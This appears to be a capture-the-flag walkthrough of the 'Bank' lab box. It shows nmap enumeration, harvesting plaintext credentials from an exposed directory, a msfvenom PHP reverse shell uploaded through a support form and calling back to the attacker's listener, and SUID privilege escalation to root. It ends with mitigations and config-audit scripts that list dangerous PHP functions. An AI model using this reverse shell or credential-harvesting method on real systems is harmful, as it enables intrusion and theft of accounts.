Bank is an easy difficulty Linux box. The IP address is 10.10.10.29.
The first step, as with most other boxes, is to run nmap against the target.
nmap -sC -sV -oA nmap/nmap 10.10.10.29
The flags used here are:
- -sC runs nmap's default scripts
- -sV does a version scan of each open service
- -oA nmap/nmap saves the output in all three formats under a folder named nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looking at the HTTP port first shows only the default Apache start page. Since the box is also running a DNS server, it is reasonable to assume the real site is served as a name-based virtual host. So that the browser sends the right Host header, an entry for the box must be added to the local hosts file.
echo "10.10.10.29 bank.htb" | sudo tee -a /etc/hosts
http://bank.htb opens up to a login page. There’s no obvious method to exploit the login form so there must be some other method of entry.
Running a dirbuster scan to find directories and files on the server revealed a directory named balance-transfer. Within this folder there are several files ending in .acc, which contain encrypted bank account records with no obvious way to decrypt them.
Sifting through the files leads to one that is significantly smaller than the others in the directory.
http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: firstname.lastname@example.org
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
Encryption failed for this particular record, so it was written out as plaintext and leaves a valid set of login credentials exposed.
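Instead of eyeballing the directory listing for the odd file, the triage can be scripted. The following is an added example and not part of the original writeup: it assumes the .acc files have already been mirrored to a local directory (for instance with `wget -r -np -nd -P acc/ http://bank.htb/balance-transfer/`), sorts them by size so the outlier surfaces first, flags any record that carries the `--ERR ENCRYPT FAILED` marker, and pulls the Email/Password pair out of it. The two "encrypted" sample records are constructed for the demo; only the failed record's contents come from the writeup.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup: triage a local mirror of
# balance-transfer/ for records whose encryption failed, instead of eyeballing
# the directory listing. It assumes the .acc files were mirrored beforehand,
# e.g. with `wget -r -np -nd -P acc/ http://bank.htb/balance-transfer/`.
# The sample records below are constructed for the demo; only the failed
# record's contents come from the writeup.
set -u

# List the .acc files in DIR carrying the marker the failed record starts with.
find_failed_acc() {
  grep -l -- '--ERR ENCRYPT FAILED' "$1"/*.acc
}

# Smallest files first: a record that was never encrypted is much shorter than
# the ciphertext blobs around it, so size outliers are worth opening first.
acc_by_size() {
  wc -c "$1"/*.acc | sort -n | grep -v ' total$'
}

# Pull the Email/Password pair out of a plaintext record as "email:password".
extract_creds() {
  awk -F': ' '/^Email:/ {e=$2} /^Password:/ {p=$2} END {print e ":" p}' "$1"
}

# Build a throwaway directory with two "encrypted" records and the failed one.
make_sample_dir() {
  local d blob name
  d=$(mktemp -d)
  blob='4f1c9e2a7d3b8c6e5a0f1d2c3b4a5968778695a4b3c2d1e0f1a2b3c4d5e6f708'
  for name in 0a1b2c3d4e5f60718293a4b5c6d7e8f9 f9e8d7c6b5a49382716f5e4d3c2b1a00; do
    cat > "$d/$name.acc" <<EOF
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: $blob$blob
Email: $blob$blob
Password: $blob$blob
CreditCards: $blob
Transactions: $blob
Balance: $blob
===UserAccount===
EOF
  done
  cat > "$d/68576f20e9732f1b2edc4df5b8533230.acc" <<'EOF'
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: firstname.lastname@example.org
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
EOF
  echo "$d"
}

# Stand-alone demo on the constructed sample; point the functions at the real
# mirror directory when working on the box.
sample=$(make_sample_dir)
acc_by_size "$sample"
for f in $(find_failed_acc "$sample"); do
  echo "plaintext record: $f -> $(extract_creds "$f")"
done
rm -rf "$sample"
```

Two independent signals are used on purpose: the marker string is exact but only catches this failure mode, while the size sort also surfaces records that are malformed in some other way.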
Using the credentials we are able to log in to the customer's bank account. The authenticated page shows typical banking transactions and account details. Only two page links exist: Support and Logout.
The support page is a ticket system for users to submit questions to the bank, and the form lets the user attach a file.
Viewing the source code of this page reveals the method of gaining entry to the system, and dictates the file extension used for the payload below.
PHP Reverse Shell
To gain access to the system we need to create a PHP reverse shell. There are several scripts available in Kali Linux, and msfvenom can be used to make a quick payload if no script is to hand. A php/reverse_php payload is used here because it connects back to a plain netcat listener; the Meterpreter PHP payloads (such as php/meterpreter_reverse_tcp) need a Metasploit multi/handler on the attacker side instead.
msfvenom -p php/reverse_php LHOST=10.10.14.17 LPORT=4455 -f raw > shell.htb
After uploading the file through the support page we need a listener to receive the connection, so start netcat on the attack machine with nc -nvlp 4455. Once the listener is running, navigating to the uploaded file in a browser at http://bank.htb/uploads/shell.htb will spawn a remote shell on the system as the www-data user.
Traversing the file system reveals that the www-data user has access to the home directory of the user chris, where the user.txt file can be located.
Running LinEnum.sh on the server revealed a binary with the SUID bit set.
Running this file reveals a script designed to give root privileges to the current user for "emergency" reasons.
A root shell is immediately granted by running the emergency script, and the root.txt file is in the root folder.
There are several steps that could have been taken to mitigate the security flaws on this system.
- Account records should be stored in a location the web server cannot serve, not under the document root.
- Turning off directory listings in the Apache web server would prevent the files from being browsed.
- Ensuring that a record is never stored if encryption fails, rather than falling back to writing it in plaintext.
- Removing debug information from customer-facing websites.
- Not allowing users to upload files that the server will execute as code.
- Disabling PHP's exec, passthru, shell_exec and related shell functions.
- The web server user should have no access to other system users' home directories, files or data.
- An SUID binary that grants a root shell should not exist, or at least should not be executable by unprivileged users.
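Three of the mitigations above can be checked mechanically against the server's configuration. The following is an added example and not part of the original writeup: it audits an Apache vhost file for directory listings being enabled and for the upload directory lacking `php_admin_flag engine off`, and audits a php.ini for shell-spawning functions missing from `disable_functions`, running the checks over a constructed weak configuration and its hardened counterpart. The paths under /var/www/bank are assumptions and not taken from the box; `.htb` appears in the hardened snippet only because the writeup's payload was executed under that extension.

```shell
#!/usr/bin/env bash
# Added example, not part of the original writeup: audit an Apache vhost and a
# php.ini against three of the mitigations above (directory listings, PHP
# execution in the upload directory, shell-spawning PHP functions). The weak
# and hardened snippets are constructed for the demo; the paths under
# /var/www/bank are assumptions, not taken from the box.
set -u

# PHP functions that hand a web shell an OS command.
DANGEROUS_FUNCS='exec passthru shell_exec system proc_open popen'

# One finding per line for an Apache config; nothing printed means clean.
audit_apache() {
  local conf="$1"
  # "Options Indexes" (no leading "-") is what exposed balance-transfer/.
  if grep -Eq '^[[:space:]]*Options[[:space:]]+([^#]*[[:space:]])?\+?Indexes([[:space:]]|$)' "$conf"; then
    echo "directory listing enabled (Options Indexes)"
  fi
  # The uploads <Directory> block must switch the PHP engine off.
  if ! awk '/<Directory[[:space:]]+[^>]*uploads/ {b=1} b {print} /<\/Directory>/ {b=0}' "$conf" \
       | grep -Eq 'php_admin_flag[[:space:]]+engine[[:space:]]+off'; then
    echo "PHP engine not disabled for the uploads directory"
  fi
}

# One finding per dangerous function missing from disable_functions.
audit_php_ini() {
  local disabled f
  disabled=$(sed -nE 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$1" | tr -d ' ' | tr ',' '\n')
  for f in $DANGEROUS_FUNCS; do
    printf '%s\n' "$disabled" | grep -qx "$f" || echo "disable_functions does not list $f"
  done
}

# Write the weak and hardened samples to a temp dir and print its path.
make_config_samples() {
  local d
  d=$(mktemp -d)
  cat > "$d/weak.conf" <<'EOF'
<VirtualHost *:80>
    ServerName bank.htb
    DocumentRoot /var/www/bank
    <Directory /var/www/bank>
        Options Indexes FollowSymLinks
        Require all granted
    </Directory>
</VirtualHost>
EOF
  cat > "$d/hardened.conf" <<'EOF'
<VirtualHost *:80>
    ServerName bank.htb
    DocumentRoot /var/www/bank
    <Directory /var/www/bank>
        Options -Indexes +FollowSymLinks
        Require all granted
    </Directory>
    # Uploads are served as static files only; .htb is listed because the
    # writeup's payload ran under that extension.
    <Directory /var/www/bank/uploads>
        php_admin_flag engine off
        Options -Indexes -ExecCGI
        RemoveHandler .php .phtml .htb
    </Directory>
</VirtualHost>
EOF
  printf 'disable_functions =\n' > "$d/weak.ini"
  printf 'disable_functions = exec,passthru,shell_exec,system,proc_open,popen\n' > "$d/hardened.ini"
  echo "$d"
}

# Stand-alone demo: the weak pair produces findings, the hardened pair none.
samples=$(make_config_samples)
for variant in weak hardened; do
  echo "== $variant =="
  audit_apache "$samples/$variant.conf"
  audit_php_ini "$samples/$variant.ini"
done
rm -rf "$samples"
```

Switching the PHP engine off for the upload directory is the control that matters most here: even if the extension check is bypassed again, a file saved under uploads/ is returned as static content instead of being executed.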